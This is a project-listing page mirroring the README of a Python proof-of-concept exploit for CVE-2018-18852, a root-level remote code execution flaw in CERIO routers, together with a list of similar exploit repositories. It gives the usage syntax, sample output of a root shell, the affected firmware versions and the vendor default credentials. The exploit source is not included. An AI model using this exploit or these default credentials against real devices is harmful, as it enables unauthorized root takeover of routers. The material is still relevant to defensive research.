GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → hook-s3c → Cve 2018 18852

hook-s3c / Cve 2018 18852

Licence: gpl-3.0
CERIO RCE CVE-2018-18852, authenticated (vendor defaults) web-based RCE as root user.

Programming Languages

python
139335 projects - #7 most used programming language

Labels

routerexploitrce

Projects that are alternatives of or similar to Cve 2018 18852

CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-52.38%)
Mutual labels:  exploit, rce
Exploit Cve 2016 9920
Roundcube 1.0.0 <= 1.2.2 Remote Code Execution exploit and vulnerable container
Stars: ✭ 34 (-19.05%)
Mutual labels:  exploit, rce
PwnX.py
🏴‍☠️ Pwn misconfigured sites running ShareX custom image uploader API through chained exploit
Stars: ✭ 30 (-28.57%)
Mutual labels:  exploit, rce
Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (+147.62%)
Mutual labels:  exploit, rce
Cve 2019 1003000 Jenkins Rce Poc
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
Stars: ✭ 270 (+542.86%)
Mutual labels:  exploit, rce
SAP vulnerabilities
DoS PoC's for SAP products
Stars: ✭ 47 (+11.9%)
Mutual labels:  exploit, rce
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (+100%)
Mutual labels:  exploit, rce
Umbraco-RCE
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Stars: ✭ 61 (+45.24%)
Mutual labels:  exploit, rce
Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (+535.71%)
Mutual labels:  exploit, rce
Jenkins Rce
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
Stars: ✭ 262 (+523.81%)
Mutual labels:  exploit, rce
Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (+107.14%)
Mutual labels:  exploit, rce
Sireprat
Remote Command Execution as SYSTEM on Windows IoT Core (releases available for Python2.7 & Python3)
Stars: ✭ 326 (+676.19%)
Mutual labels:  exploit, rce
Ciscoexploit
Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)
Stars: ✭ 73 (+73.81%)
Mutual labels:  exploit, rce
exploit-CVE-2015-3306
ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container
Stars: ✭ 97 (+130.95%)
Mutual labels:  exploit, rce
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (+2469.05%)
Mutual labels:  exploit, rce
Exploit Cve 2017 7494
SambaCry exploit and vulnerable container (CVE-2017-7494)
Stars: ✭ 265 (+530.95%)
Mutual labels:  exploit, rce
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+9085.71%)
Mutual labels:  rce, exploit
Pwn jenkins
Notes about attacking Jenkins servers
Stars: ✭ 841 (+1902.38%)
Mutual labels:  exploit, rce
Angularconcepts
Key Angular Concepts using Latest Angular version 5
Stars: ✭ 31 (-26.19%)
Mutual labels:  router
Pysploit
Remote exploitation framework written in Python
Stars: ✭ 37 (-11.9%)
Mutual labels:  exploit
View All Similar Projects ➔

CERIO router Authenticated RCE (backdoor vendor creds) CVE-2018-18852 Python PoC

hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

Working Python PoC for CVE-2018-18852, originally appearing on; https://github.com/hook-s3c/CVE-2018-18852

What's up

CERIO Router models and variants of, DT300N, DT100G, AMR-3204, WMR-200N are vulnerable to an authenticated web-based RCE as root user.

Exists as an 0day undisclosed advisory; https://www.fortiguard.com/zeroday/FG-VD-18-149

Vendor default credentials are usually present, so execution is trivial.

Architecture is MIPS.

Usage and example

Usage: exploit.py <ipaddress> <port> <creds>

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

[email protected]:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

[email protected]:~#

Default cred combos;

  • operator:1234
  • admin:admin
  • root:default

Greetz

Shoutout to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up

HTP!!!! YEET

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].